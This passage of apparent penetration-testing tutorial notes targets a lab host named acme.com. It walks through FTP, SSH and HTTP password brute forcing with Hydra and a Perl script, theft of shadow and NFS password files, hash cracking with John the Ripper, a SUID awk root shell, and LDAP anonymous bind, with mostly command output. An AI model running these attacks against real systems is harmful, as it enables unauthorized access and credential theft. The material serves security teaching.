iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
...
sam@asus:~%

Some SNMP information dumps can be megabytes in size, so its better to redirect the output to a file and grep the resulting file for interesting information strings in the output.

Attacking FTP Servers

We first do a quick nmap scan against the remote host ftp.acme.com and try and fingerprint the current ftp service running.

root@asus:~% nmap -sV -T4 ftp.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-02 20:18 MDT
Nmap scan report for ftp.acme.com (ftp.acme.com)
Host is up (0.000073s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.88 seconds
root@asus:~% 

We see the remote host is indeed serving up the FTP protocol. Let now try and connect to the remote ftp server using the telnet program and issue some commands.

root@asus:~% telnet ftp.acme.com 21
Trying ftp.acme.com...
Connected to ftp.acme.com.
Escape character is '^]'.
220 (vsFTPd 3.0.3)
quit
221 Goodbye.
Connection closed by foreign host.
root@asus:~% 

Our next step is to see if the ftp server allows anonymous connections.

sam@asus:~% ftp
ftp> open ftp.acme.com
Connected to ftp.acme.com.
220 (vsFTPd 3.0.3)
Name (ftp.acme.com:sam): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

We can connect anonymously, but there is nothing in the directory. our next test will see if we can upload files to the server anonymously.

ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
553 Could not create file.
ftp> 

No luck here. One thing we can do is take information such as names from the company's website and try to fuzz for possible ftp users on the server.

FTP User Enumeration

We have some names from the company website which we will use to fuzz valid usernames for the ftp server. We can use our username script from Enumerating UNIX Usernames to generate a list of possible usernames on the server from the list of users we got from the website.

clare johnson
vance patel
hayden smith
sasha reed
jared wilson

sam@asus:~/pentest_notes% perl username-fuzz.pl hayden smith
hayden
smith
haysmith
smithhay
s.hayden
s_hayden
s-hayden
smihayden
hayden.smith
hayden_smith
hayden-smith
h.smith
h_smith
h-smith
smith.ha
smith_ha
smith-ha
haydensm
smhayden
...

Once we have a list of possible usernames we can now move on to using hydra to find out the username format. All we need is one user to test for, after that we can apply to username rules to the remaining names on the list.

For our payloads we will use a list of common usernames formats for the user list and the rockyou wordlist for the passwords. With some luck we should be able to find some valid user/password combinations using Hydra.

sam@asus:~% hydra -L haydensmith.txt -P rockyou.txt ftp://ftp.acme.com
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-09-12 12:24:53
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~14008 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: ftp.acme.com   login: hayden   password: ashley
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-09-12 12:26:31
sam@asus:~% 

We found a valid user/pass combination and username format for the remote FTP server. Now we need to construct a new list of usernames using the format we found via Hydra and repeat the process for the other users.

Finding Valid FTP Accounts

Our user.txt should look like so:

clare
vance
hayden
sasha
jared

sam@asus:~% hydra -L users.txt -P rockyou.txt ftp://ftp.acme.com
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-09-12 12:24:53
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~14008 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: ftp.acme.com   login: jared   password: qwerty
[21][ftp] host: ftp.acme.com   login: vance   password: 654321
[21][ftp] host: ftp.acme.com   login: clare   password: jessica
[21][ftp] host: ftp.acme.com   login: sasha   password: michael
[21][ftp] host: ftp.acme.com   login: hayden   password: ashley
1 of 1 target successfully completed, 5 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-09-12 12:26:31
sam@asus:~% 

We successfully found credentials for all the usernames in the list.

Browsing FTP directories

sam@asus:~% ftp
ftp> open 148.32.42.5
Connected to 148.32.42.5.
220 (vsFTPd 3.0.3)
Name (148.32.42.5:sam): hayden
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x    4 65534    65534        4096 May 15 07:49 ftp
-rw-rw-r--    1 1005     1005        48605 Sep 12 17:38 home.tar.gz
drwx------    2 1005     1005         4096 May 01 09:44 mail
-rwxr--r--    1 1005     1005          594 Sep 02 14:54 server.pl
226 Directory send OK.
ftp> get home.tar.gz
local: home.tar.gz remote: home.tar.gz
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for home.tar.gz (48605 bytes).
226 Transfer complete.
48605 bytes received in 0.00 secs (9.9986 MB/s)
ftp> exit
221 Goodbye.
sam@asus:~% 

We check the bash history file for interesting finds.

Trying to login to SSH

We can try and login to ssh with the supplied crededitnails to see if we get lucky or not.

sam@asus:~% ssh -l clare 148.32.42.5
clare@148.32.42.5's password: 
Welcome to GalliumOS 2.1 (GNU/Linux 4.9.4-galliumos-braswell x86_64)

 * Documentation:  https://wiki.galliumos.org/
 * Support:        https://reddit.com/r/GalliumOS
Last login: Tue Sep  3 13:40:25 2019 from 148.32.42.5
clare@asus:~$ sudo -l
[sudo] password for clare: 
Sorry, user clare may not run sudo on asus.
clare@asus:~$

As we can see the user clare is not in the sudoers file. Our next step is to check for SUID binaries to see if we can execute commands as a higher privelege user such as root.

clare@asus:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/virtualbox/VBoxHeadless
/usr/lib/virtualbox/VBoxNetDHCP
/usr/lib/virtualbox/VBoxNetAdpCtl
/usr/lib/virtualbox/VBoxSDL
/usr/lib/virtualbox/VirtualBox
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/galliumos-update/update_package_index
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/chromium-browser/chrome-sandbox
/usr/bin/perl5.22.1
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/tcptraceroute.mt
/usr/bin/perl
/usr/bin/sudo
/usr/bin/gawk
/usr/bin/pkexec
/usr/sbin/pppd
/home/sam/unix/prog
/bin/ping6
/bin/su
/bin/ping
/bin/fusermount
/bin/mount
/bin/cp
/bin/umount
/sbin/mount.nfs
/sbin/mount.ecryptfs_private
clare@asus:~$ 

We see that the 'cp' command is suid able. all we need to do is cp the /etc/shadow file to a file in our home directory and crack the remaining hashes with john the ripper.

clare@asus:~$ cp /etc/shadow .shadow
clare@asus:~$ ls -l .shadow
-rw-r----- 1 root clare 2199 Sep 12 20:19 .shadow
clare@asus:~$ cat .shadow
root:!:17866:0:99999:7:::
daemon:*:17200:0:99999:7:::
bin:*:17200:0:99999:7:::
sys:*:17200:0:99999:7:::
sync:*:17200:0:99999:7:::
games:*:17200:0:99999:7:::
man:*:17200:0:99999:7:::
lp:*:17200:0:99999:7:::
mail:*:17200:0:99999:7:::
news:*:17200:0:99999:7:::
uucp:*:17200:0:99999:7:::
proxy:*:17200:0:99999:7:::
www-data:*:17200:0:99999:7:::
backup:*:17200:0:99999:7:::
list:*:17200:0:99999:7:::
irc:*:17200:0:99999:7:::
gnats:*:17200:0:99999:7:::
nobody:*:17200:0:99999:7:::
systemd-timesync:*:17200:0:99999:7:::
systemd-network:*:17200:0:99999:7:::
systemd-resolve:*:17200:0:99999:7:::
systemd-bus-proxy:*:17200:0:99999:7:::
messagebus:*:17200:0:99999:7:::
syslog:*:17200:0:99999:7:::
_apt:*:17200:0:99999:7:::
ntp:*:17225:0:99999:7:::
avahi-autoipd:*:17225:0:99999:7:::
avahi:*:17225:0:99999:7:::
colord:*:17225:0:99999:7:::
dnsmasq:*:17225:0:99999:7:::
pulse:*:17225:0:99999:7:::
hplip:*:17225:0:99999:7:::
rtkit:*:17225:0:99999:7:::
saned:*:17225:0:99999:7:::
usbmux:*:17225:0:99999:7:::
speech-dispatcher:!:17225:0:99999:7:::
uuidd:*:17225:0:99999:7:::
statd:*:17873:0:99999:7:::
mysql:!:17897:0:99999:7:::
openldap:!:17906:0:99999:7:::
snmp:*:18010:0:99999:7:::
postfix:*:18013:0:99999:7:::
clare:$6$5GIN00sB$b2lbPsKpUr5hWUVy4GtaHWKSnmLs8/nF67776DYcQZ5h9jie77ru9YsYv3t655Tt9o3HEbcrRTkzuAYgHWWKx.:18013:0:99999:7:::
vance:$6$EHEtCGTs$5IJBJ8NSP4C97t7IxaOwxWf8VqR3N5El3FxA2QexeLS7.RzA3emYjKtXdXy3MnUGBgf5XixOlPSai0XMiIBdw.:18013:0:99999:7:::
sasha:$6$tyRJrsuF$XHZjgCVEZciytpWOFKRK/FonPq54W5wvjOvTDirXcJXDbqx1tRGsL1jiqugypVMRjvKfEE5jjDssFnonpCKA60:18013:0:99999:7:::
hayden:$6$GOUeWA0i$.50S6PcV1KLQeRCoccBEE7yUwjzA2Jo2DjuSXk/K5NJisdgrOiRGkdIhmustFnmi/41tr4Y99/9JlAm8nR4rg.:18013:0:99999:7:::
jared:$6$DYou14VW$s5Q4LyqWvhqkFY05SUfjF7iRJWgWhyHUj/pJk3MPMUSwzapAx.eJutyv00fcXouN3yrcw56nuwBkgpIFWojAs0:18013:0:99999:7:::
dovecot:*:18014:0:99999:7:::
dovenull:*:18014:0:99999:7:::
bind:*:18015:0:99999:7:::
ftp:*:18031:0:99999:7:::
sshd:*:18142:0:99999:7:::
clare@asus:~$ 

Cracking Passwords with John The Ripper

we load up the .pot file for john to run against.

clare:$6$5GIN00sB$b2lbPsKpUr5hWUVy4GtaHWKSnmLs8/nF67776DYcQZ5h9jie77ru9YsYv3t655Tt9o3HEbcrRTkzuAYgHWWKx.
vance:$6$EHEtCGTs$5IJBJ8NSP4C97t7IxaOwxWf8VqR3N5El3FxA2QexeLS7.RzA3emYjKtXdXy3MnUGBgf5XixOlPSai0XMiIBdw.
sasha:$6$tyRJrsuF$XHZjgCVEZciytpWOFKRK/FonPq54W5wvjOvTDirXcJXDbqx1tRGsL1jiqugypVMRjvKfEE5jjDssFnonpCKA60
hayden:$6$GOUeWA0i$.50S6PcV1KLQeRCoccBEE7yUwjzA2Jo2DjuSXk/K5NJisdgrOiRGkdIhmustFnmi/41tr4Y99/9JlAm8nR4rg.
jared:$6$DYou14VW$s5Q4LyqWvhqkFY05SUfjF7iRJWgWhyHUj/pJk3MPMUSwzapAx.eJutyv00fcXouN3yrcw56nuwBkgpIFWojAs0

Here we will use the rockyou word list with the users and password hashes in the .pot file.

root@asus:~/src/john/run% ./john --wordlist=/home/sam/rockyou.txt /home/sam/john.pot
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE4.1 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jessica          (clare)
qwerty           (jared)
654321           (vance)
ashley           (hayden)
michael          (sasha)
5g 0:00:00:03 DONE (2019-09-12 19:26) 1.412g/s 36.15p/s 180.7c/s 180.7C/s 123456..diamond
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@asus:~/src/john/run% 

Basic HTTP Authentication Dictionary Attack

Basic HTTP Authentication Dictionary Attack

Sometimes you come across basic http authentication which needs to be cracked in order to gain access to the protected contents of the server. We can use two ways to acomplish the task, one is using Hydra to brute force the login and the second is we can write our own script in PERL.

hydra -l admin -P wordlist.txt <hostname> http-get <web-directory>

root@ubuntu:~/public_html# hydra -l admin -P wordlist.txt localhost http-get /~sam/protected
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-08-17 12:26:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 109 login tries (l:1/p:109), ~7 tries per task
[DATA] attacking http-get://localhost:80//~sam/protected
[80][http-get] host: localhost   login: admin   password: manager
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-08-17 12:26:46
root@ubuntu:~/public_html# 

We can write our own script in perl to apply a dictonary attack on basic HTTP authentication.

#!/usr/bin/env perl
#
# basic http auth brute force
#
use strict;
use warnings;
use LWP::UserAgent;
use URI;

## Target URL
my $target = URI->new("http://localhost/~sam/protected/"); 
my $host = $target->host.":".$target->port;

## Realm to use
my $realm = "Protected Content"; 

## User to brute force
my $user = "admin"; 

## Passwords list
my $wordlist = "wordlist.txt"; 
open(my $fh, '<', $wordlist) or die $!;

my $user_agent = LWP::UserAgent->new();

while (my $pass = <$fh>) {
 chomp($pass);
 $user_agent->credentials($host, $realm, $user, $pass);

 my $res = $user_agent->get($target);

 print "200 OK -> $user:$pass\n" if ($res->is_success); 
}

If we run the script we get the username and password based on a HTTP 200 OK repsonse code.

sam@ubuntu:~/public_html$ perl basic-http-auth.pl
200 OK -> admin:manager
sam@ubuntu:~/public_html$ 

Attacking NFS

This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com

k.madden@mail.acme.com
t.stephens@mail.acme.com
k.parsons@mail.acme.com
d.hansen@mail.acme.com
k.ball@mail.acme.com
c.harvey@mail.acme.com
j.macdonald@mail.acme.com
c.gibbs@mail.acme.com
j.mcpherson@mail.acme.com
g.joyner@mail.acme.com
c.casey@mail.acme.com
c.eaton@mail.acme.com
c.rojas@mail.acme.com

With this list of email addresses and possible user names we will attempt to gain shell access to the remote through NFS enumeration and exploitaion.

First lets do a quick service scan on our suspected NFS server.

root@asus:~/pentest_notes% nmap -sV -T4 -p111,2049 nemo.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2018-12-28 04:21 MST
Nmap scan report for nemo.acme.com
Host is up (0.0024s latency).
PORT     STATE SERVICE VERSION
111/tcp  open  rpcbind 2 (RPC #100000)
2049/tcp open  nfs     2-3 (RPC #100003)
MAC Address: 08:00:27:30:FA:3B (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.97 seconds
root@asus:~/pentest_notes% 

Query rpcbind for information about what services are currently running on the remote host.

sam@asus:~/pentest_notes% rpcinfo -p nemo.acme.com
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100005    1   udp    839  mountd
    100005    3   udp    839  mountd
    100005    1   tcp    673  mountd
    100005    3   tcp    673  mountd
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
sam@asus:~/pentest_notes% 

We can verify is the NFS service is actually running by querying a specfic port and program number.

sam@asus:~/pentest_notes% rpcinfo -n 2049 -t nemo.acme.com 100003
program 100003 version 2 ready and waiting
program 100003 version 3 ready and waiting
sam@asus:~/pentest_notes% 

Now we can query the NFS server and ask to see the list of mountable drives

root@asus:~/pentest_notes% showmount -e nemo.acme.com
Export list for nemo.acme.com:
/export/backups (everyone)
root@asus:~/pentest_notes%

We see that the /export/backups is accessible to everyone so we will try to mount that directory locally. first we need to create a local mount point. we will call this `/mnt/loot`.

root@asus:~/pentest_notes% mkdir /mnt/loot
root@asus:~/pentest_notes%

after we create the local mount point we can try and mount the remote directory.

root@asus:~/pentest_notes% mount nemo.acme.com:/export/backups /mnt/loot
root@asus:~/pentest_notes%

If no errors occur then we are good. now lets see what we got by cd'ing into our local mount point `/mnt/loot`.

root@asus:~/pentest_notes% cd /mnt/loot;ls -la
total 12
drwxrwxrwx 2 root root  512 Dec 27 20:44 .
drwxr-xr-x 4 root root 4096 Dec 28 03:53 ..
-rwxrwxrwx 1 root root 5604 Dec 27 20:44 master.passwd.old
root@asus:/mnt/loot% 

root@asus:/mnt/loot% cat master.passwd.old | less
root:$2b$10$7KoamPq9ZOkL4YUYoaNpHu2S671nAjEd7jhiy6Kf.TWCLpA7xwnrG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh
daemon:*:1:1::0:0:The devil himself:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/operator:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin
build:*:21:21::0:0:base and xenocara build:/var/empty:/bin/ksh
sshd:*:27:27::0:0:sshd privsep:/var/empty:/sbin/nologin
_portmap:*:28:28::0:0:portmap:/var/empty:/sbin/nologin
_identd:*:29:29::0:0:identd:/var/empty:/sbin/nologin
_rstatd:*:30:30::0:0:rpc.rstatd:/var/empty:/sbin/nologin
...
root@asus:/mnt/loot%

We got what looks like a backup of the master.passwd (BSD) file of the NFS server which we will use next to try and gain shell access.

root@asus:/mnt/loot% cat master.passwd.old | awk 'BEGIN{FS=":"} {if ($3 > 1000 || $3 == 0) print $1 ":" $2}'
root:$2b$10$7KoamPq9ZOkL4YUYoaNpHu2S671nAjEd7jhiy6Kf.TWCLpA7xwnrG
k.madden:$2b$09$d6VfZmp2SbBV1HVo2OYC4ebZeoNspr3XoMVOaCGTaiXaWGng45.3u
t.stephens:$2b$09$daF97oYu6wAi3c0gHkKgPuKn0HAeu8yf8u1b3aBRmxEFXyJHyCpHG
k.parsons:$2b$09$/goSifrmIrT/sds5UHdPwOyQrO9RcoogBUW.r6JviwMi4s.osmp6G
d.hansen:$2b$09$4Z5FxDk1gmLk9/utv8B78OOsEK/fONTPD2kSzFzgGbcXS6t.fxKga
k.ball:$2b$09$Oy1xHnN5akCb3T04X2mdGes.9TRm6uL4eCz7N7HVBFj2FV83aoSxe
c.harvey:$2b$09$a.FBS1/idqVpL1c1W4BtkuZrLiliBrk9FiYsJ834TJQMLosnLWzde
j.macdonald:$2b$09$tNp6xHtL5F1fTCx7cugGh.iqeFwBU5QkXTSDyzHerOLxYwwI0XplC
c.gibbs:$2b$09$J21XaR8.IOy30OXzSU61Kefyg6w24GN5i9nshfQkjOAsJqYHFRDRq
j.mcpherson:$2b$09$2V.h6JWa/I.zY1g0oc/K3uhnYugP0kMUXGCBTzSngi1Km2XKGM3TO
g.joyner:$2b$09$LPPpcASJvm57u7ethcJ9Zezo0btiowPieLNaP2VneMmVZUpu/Us0u
c.casey:$2b$09$tkrV9v9ZOoX/lABPhbBTeOXtHX/hogOXqK47KE6N.DQKKlimDw8LO
c.eaton:$2b$09$1ftTp/OAcRGb5GWlTqeA8.j4naL0dwlIUh.RsQNez1yEOQjDMr/Cq
c.rojas:$2b$09$MMs5cVaZrAlXmT/enxCbSOwzdi3I.PUGaN83wXw5/XHwYRR6oOYY.
root@asus:/mnt/loot%

All these entries will be used in a dictonary attack against the master.passwd file using JTR (John The Ripper).

root@asus:~/src/john/run% ./john --format=bcrypt --wordlist=/home/sam/pentest_notes/ry.txt ~/pentest_notes/master.passwd.openbsd 
Using default input encoding: UTF-8
Loaded 13 password hashes with 13 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 512 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
naruto           (k.ball)
summer           (c.harvey)
whatever         (k.madden)
spongebob        (c.gibbs)
junior           (g.joyner)
yellow           (c.rojas)
taylor           (c.eaton)
cookie           (d.hansen)
sweety           (j.macdonald)
joseph           (j.mcpherson)
dragon           (t.stephens)
softball         (c.casey)
12g 0:00:00:03 DONE (2018-12-28 13:44) 3.508g/s 3.801p/s 49.41c/s 49.41C/s whatever..yellow
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@asus:~/src/john/run% 

After we got the usernames and passwords we could, we can now test for still valid logins using the Hydra tool against SSH.

root@asus:~/pentest_notes% hydra -L nemo.acme.com-userlist.txt -P nemo.acme.com-passlist.txt nemo.acme.com ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-28 13:56:23
[DATA] max 16 tasks per 1 server, overall 64 tasks, 52 login tries (l:13/p:4), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: nemo.acme.com   login: k.madden   password: whatever
[22][ssh] host: nemo.acme.com   login: t.stephens   password: dragon
[22][ssh] host: nemo.acme.com   login: c.casey   password: softball
[22][ssh] host: nemo.acme.com   login: c.rojas   password: yellow
1 of 1 target successfully completed, 4 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-26 22:55:50
root@asus:~/pentest_notes% 

So out of the 13 users we found, 4 of them still use the same password for their login. Now we can verify if each login works.

sam@asus:~/pentest_notes% ssh -l k.madden nemo.acme.com
The authenticity of host 'nemo.acme.com (192.168.0.133)' can't be established.
ECDSA key fingerprint is SHA256:JdXLz4mKxMOL/l6tGK/5ETiDUAWVVX0HCmDiuQyuxig.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'nemo.acme.com' (ECDSA) to the list of known hosts.
k.madden@nemo.acme.com's password: 
OpenBSD 6.4 (GENERIC) #926: Thu Oct 11 13:43:06 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

nemo$ hostname
nemo.acme.com
nemo$ id
uid=1001(k.madden) gid=1001(k.madden) groups=1001(k.madden), 0(wheel)
nemo$ su t.stephens
Password:
nemo$ id
uid=1002(t.stephens) gid=1002(t.stephens) groups=1002(t.stephens), 0(wheel)
nemo$ su c.casey
Password:
nemo$ id
uid=1011(c.casey) gid=1011(c.casey) groups=1011(c.casey), 0(wheel)
nemo$ su c.rojas
Password:
nemo$ id
uid=1013(c.rojas) gid=1013(c.rojas) groups=1013(c.rojas), 0(wheel)
nemo$ exit
nemo$ exit
nemo$ exit
nemo$ exit
Connection to nemo.acme.com closed.
sam@asus:~/pentest_notes% 

As you can see all of the users are in the `wheel` group meaning they can su to root if they know the passwd.

Suid binary exploitation

Suid binary exploitation involves a binary with its SUID bit set so that any thing executed by the program will do so with privelges of that user. First we search for suid binarys in the root of the filesystem.

sam@asus:~% find / -user root -perm -4000 -exec ls -ldb {} \;
-r-sr-xr-x 1 root bin 38836 Aug 10 16:16 /usr/bin/at
-rwsr-xr-x 1 root root 11288 Nov 19 11:29 /usr/bin/awk
-r-sr-xr-x 1 root bin 19812 Aug 10 16:16 /usr/bin/crontab
---s--x--x 1 root sys 46040 Aug 10 15:18 /usr/bin/ct
-r-sr-xr-x 1 root sys 12092 Aug 11 01:29 /usr/lib/mv_dir
-r-sr-sr-x 1 root bin 33208 Aug 10 15:55 /usr/lib/lpadmin
-r-sr-sr-x 1 root bin 38696 Aug 10 15:55 /usr/lib/lpsched
---s--x--- 1 root rar 45376 Aug 18 15:11 /usr/rar/bin/sh
-r-sr-xr-x 1 root bin 12524 Aug 11 01:27 /usr/bin/df
-rwsr-xr-x 1 root sys 21780 Aug 11 01:27 /usr/bin/newgrp
-r-sr-sr-x 1 root sys 23000 Aug 11 01:27 /usr/bin/passwd
-r-sr-xr-x 1 root sys 23824 Aug 11 01:27 /usr/bin/su
...
sam@asus:~%

We can see the AWK programming has `-rwsr` instead of `-rwxr` signifying the suid bit is set on the AWK program. We also see that it is root:root meaning any instruction we pass to AWK will be ran under root privileges.

sam@asus:~% ls -la /usr/bin/awk
-rwsr-xr-x 1 root root 1911288 Nov 19 11:29 /usr/bin/awk
sam@asus:~% 

next we can use the AWK program to try and spawn a simple shell with the awk system() function call.

sam@asus:~% id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),27(sudo),46(plugdev),112(lpadmin)
sam@asus:~%

Lets issue our shell command and check our uid/gid stats afterward.

sam@asus:~% awk 'BEGIN{system("/bin/sh")}'
# id
uid=1000(sam) gid=1000(sam) euid=0(root) groups=1000(sam),4(adm),24(cdrom),27(sudo),46(plugdev),112(lpadmin)
# 

And of course we raid the /etc/shadow file for password hashes.

# cut -d: -f1,2 /etc/shadow
...
root:$6$uGqhP09J$cDygxAzkw0gMFeTJsyhTfyYsqY2JPkx6wyJ3gJ6Xgr5aIMUeUZ0gjnaw.GPRQSTuV5ep1gBdcjnlC85GzirU9.
sam:$6$m0baQXyk$o3gxkMH4aI1M5IGJWWI.SBcrpKhcutuPt98O3UtQ8wljLuGmTsX5YKzaDsJSX65g14hf76kVLNZVvPPzVJRV4/
evelyn:$6$mJ3sgN0Q$ex3hiPuSebIvKbVLFFbDvUy.CrZowiSf1g/HAR78hLI8pFMG.WO9wma9dnA45MrIDYpdXtMV2CXK8EXAo6ix61
price:$6$G7zo0DN0$Ob9ro9/fMXYNja40VsbcPCh6AHg9UDGg01Lv33H1eRw.QiB8/kQ0WVbs8yz59w38BwHsJpRCbvN1tquj9exlT.
ralph:$6$GGNFUI3s$bBf5FuCP6cbe2f881sLi2kO1woWqM58wzLGSy72mtLTs4KI/ok7CA4rtHNFXUpd7FHYWfnpQyN0tUCvvqK5qm0
lester:$6$l1ULRsYG$b0eBdMJx8eniZ0UMYlYVyC5O8aUDDg5NWMumLEqO8yowvEbKS/uIhDKjjbEXJ3vvokvhrDs47BSbWpr151tld0
wylie:$6$ao/opbGp$atg67ybDl2hObBB06AcnvJpNggaxMNJ7ubsb8mXPo67qg29uZZ3oCaloiuVrhoHrbNgN0PkSINOF7OnnEr6Ac.
callum:$6$b19tmwgI$NB7lXM8FwzMiV0zQOT5fOpMhmSN6Q6fHswtEHBum66/Wt9IwGR.WHbcL5vzEuCVx8woHv1w/eOF7/PxjKtHWQ.
mannix:$6$2RPPrMar$DDV.sfg7/CZyV2NHsoXa2oIDI/kn3ZK4aHpIcUR59JwPsl1/JeSokDFWRvpiZymgFg1zqh2ZY919Z5D3BDlBs.
# exit
sam@asus:~% 

Since our AWK binary suid bit is set and owned by root `euid=0(root)`, the AWK program will execute any instructions as root. this is one of many tools you can use to escalate privilges on a UNIX box if the suid bit is set.

Testing LDAP servers with examples

Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up and running.

sam@asus:~% ping -c 3 148.32.42.5
PING 148.32.42.5 (148.32.42.5) 56(84) bytes of data.
64 bytes from 148.32.42.5: icmp_seq=1 ttl=64 time=0.043 ms
64 bytes from 148.32.42.5: icmp_seq=2 ttl=64 time=0.082 ms
64 bytes from 148.32.42.5: icmp_seq=3 ttl=64 time=0.122 ms

--- 148.32.42.5 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2087ms
rtt min/avg/max/mdev = 0.043/0.082/0.122/0.033 ms
sam@asus:~% 

We first start by scanning the host with nmap to verify if port 389 is indeed open.

sam@asus:~% sudo nmap -sV -p389 148.32.42.5

Starting Nmap 7.01 ( https://nmap.org ) at 2019-01-22 10:55 MST
Nmap scan report for ldap.acme.com (148.32.42.5)
Host is up (0.00014s latency).
PORT    STATE SERVICE VERSION
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
sam@asus:~% 

As we can see nmap reports back to us that the is indeed open and running the LDAP service. Anonymous Bind Our next test is to see if this LDAP server is vulnerable to a NULL base or anonymous bind. We will search for all Distinguished Names (DN) in the tree.

sam@asus:~% ldapsearch -x -b "dc=acme,dc=com" "*" -h 148.32.42.5 | awk '/dn: / {print $2}'
dc=acme,dc=com
cn=admin,dc=acme,dc=com
cn=ldapusers,dc=acme,dc=com
cn=evelyn
cn=sales,dc=acme,dc=com
ou=direct,cn=sales,dc=acme,dc=com
ou=channel,cn=sales,dc=acme,dc=com
cn=support,dc=acme,dc=com
